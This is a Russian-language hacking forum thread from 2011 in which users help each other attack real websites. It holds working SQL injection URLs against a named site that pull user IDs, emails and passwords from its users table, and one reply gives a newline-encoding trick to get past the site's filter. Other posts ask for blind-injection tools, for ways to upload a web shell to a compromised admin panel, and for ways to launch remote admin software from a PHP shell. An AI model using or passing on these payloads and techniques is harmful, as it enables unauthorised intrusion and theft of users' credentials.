HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16221  
Старый 27.01.2011, 18:09
j-prof
Постоянный
Регистрация: 29.08.2010
Сообщений: 321
С нами: 8265206

Репутация: -4
По умолчанию

privateurl.com

в поле логин

хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите

кста через union можно ток select выполнять или апдэйт, delete, insert тож
 
Ответить с цитированием

  #16222  
Старый 28.01.2011, 01:12
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами: 8580980

Репутация: 0
По умолчанию

Так работает:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
 
Ответить с цитированием

  #16223  
Старый 28.01.2011, 01:50
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами: 9382468

Репутация: 104
По умолчанию

Цитата:
Сообщение от DCrypt  
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
Кажется там from фильтруется.
 
Ответить с цитированием

  #16224  
Старый 28.01.2011, 02:27
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами: 8580980

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/

Где?
 
Ответить с цитированием

  #16225  
Старый 28.01.2011, 14:03
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Цитата:
Сообщение от DCrypt  
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
 
Ответить с цитированием

  #16226  
Старый 28.01.2011, 15:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
 
Ответить с цитированием

  #16227  
Старый 28.01.2011, 15:25
KandidaT'S
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами: 8338646

Репутация: 0
По умолчанию

поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
 
Ответить с цитированием

  #16228  
Старый 28.01.2011, 23:04
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

Safe-mode: ON (secure)

C:\ drwxrwxrwx

(это пхп шелл)

Можно как-то запускать радмин или что-то?
 
Ответить с цитированием

  #16229  
Старый 29.01.2011, 01:07
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию

Цитата:
Сообщение от KandidaT'S  
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.

В админке есть залив файлов?

Цитата:
Сообщение от noviyuser  
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
 
Ответить с цитированием

  #16230  
Старый 29.01.2011, 08:26
KandidaT'S
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами: 8338646

Репутация: 0
По умолчанию

заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.